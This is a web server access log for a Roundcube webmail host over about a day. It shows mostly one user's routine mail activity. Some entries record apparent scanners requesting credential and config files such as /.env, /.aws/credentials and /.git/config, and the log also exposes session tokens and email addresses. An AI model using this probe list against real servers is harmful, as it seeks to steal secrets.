"https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=YSR5KC31JlfJz8h37Zy6AZ6Fm18kalXQ" [Client 222.117.41.51] [Length 11623] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771142613060" [Client 222.117.41.51] [Length 371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771142613104&_=1771142613059" [Client 222.117.41.51] [Length 3601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:35 +0000] - 302 302 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_mbox=INBOX&_action=compose" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:35 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=compose&_id=54701758469917dd76394d" [Client 222.117.41.51] [Length 9174] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:38 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=autocomplete" [Client 222.117.41.51] [Length 126] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:39 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=autocomplete" [Client 222.117.41.51] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:40 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=autocomplete" [Client 222.117.41.51] [Length 221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:03:42 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=autocomplete" [Client 222.117.41.51] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:04:38 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_unlock=loading1771142675019&_framed=1" [Client 222.117.41.51] [Length 395] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:04:39 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_refresh=1&_mbox=INBOX" [Client 222.117.41.51] [Length 11623] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:04:39 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771142679654" [Client 222.117.41.51] [Length 371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:04:39 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771142679685&_=1771142679653" [Client 222.117.41.51] [Length 3601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:05:36 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/22270184778438" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:08:05:40 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 3496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:06:40 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 161] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:07:40 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:08:40 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:09:40 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:09:45 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_mbox=INBOX" [Client 222.117.41.51] [Length 11623] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:09:45 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771142985667" [Client 222.117.41.51] [Length 372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:09:45 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771142985713&_=1771142985666" [Client 222.117.41.51] [Length 3632] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:09:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_mbox=INBOX" [Client 222.117.41.51] [Length 11623] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:09:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771142987215" [Client 222.117.41.51] [Length 372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:09:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771142987244&_=1771142987214" [Client 222.117.41.51] [Length 3632] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:10:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:11:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:12:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:13:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:14:48 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:08:41:29 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 2.57.122.173] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" "-" -[15/Feb/2026:09:06:03 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/21520162613543" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:09:55:03 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:09:55:04 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:09:55:07 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:07 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=D6z9BIw9npOEe1S2FknqfClmF2S3grYD" [Client 222.117.41.51] [Length 11619] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:08 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771149308047" [Client 222.117.41.51] [Length 371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:08 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771149308104&_=1771149308046" [Client 222.117.41.51] [Length 3728] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:11 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13823&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4865] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:11 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=citecta%40naver.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_framed=1&_caps=&_uid=13823&_mbox=INBOX&_safe=1&_action=preview" [Client 222.117.41.51] [Length 5014] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:22 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13824&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:22 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=windpacer%40hanmocnn.co.kr&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:37 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13818&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4880] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:55:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13823&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5014] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:09:56:08 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=refresh" [Client 222.117.41.51] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[15/Feb/2026:10:06:26 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/2059769144768" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:11:06:52 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/10128267644309" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:12:07:16 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/2271132194420" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:13:07:41 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/15273027815334" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:14:08:04 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/48762442931492" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:15:08:30 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/7003157898126" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:16:08:53 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/242531237110107" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:18:09:43 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/716186169298" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.env" [Client 45.148.10.238] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/aws.env" [Client 45.148.10.238] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.live" [Client 45.148.10.238] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/wp-config" [Client 45.148.10.238] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.aws/credentials" [Client 45.148.10.238] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 45.148.10.238] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mediapartners-Google" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/crm/.env" [Client 45.148.10.238] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/awstats/.env" [Client 45.148.10.238] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 9; Pixel 3 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.bak" [Client 45.148.10.238] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36" "-" -[15/Feb/2026:18:33:38 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.production" [Client 45.148.10.238] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15" "-" -[15/Feb/2026:18:33:39 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.prod" [Client 45.148.10.238] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-G900A Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36" "-" -[15/Feb/2026:19:10:06 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/845330302829" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:19:24:11 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 205.169.39.69] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" -[15/Feb/2026:19:24:11 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 205.169.39.69] [Length 2274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" -[15/Feb/2026:19:24:20 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 205.169.39.69] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "-" -[15/Feb/2026:19:24:22 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 205.169.39.69] [Length 2273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "-" -[15/Feb/2026:20:10:34 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/275614720369" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:20:50:10 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.git/config" [Client 173.212.204.156] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" -[15/Feb/2026:21:10:56 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/298912928363" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:22:11:21 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/293861870717870" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[15/Feb/2026:22:55:53 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:22:55:55 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:22:55:59 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr" -[15/Feb/2026:22:56:01 +0000] - - 301 - POST https mail.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr" -[16/Feb/2026:01:12:40 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/2628576016059" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[16/Feb/2026:01:45:38 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:40 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] 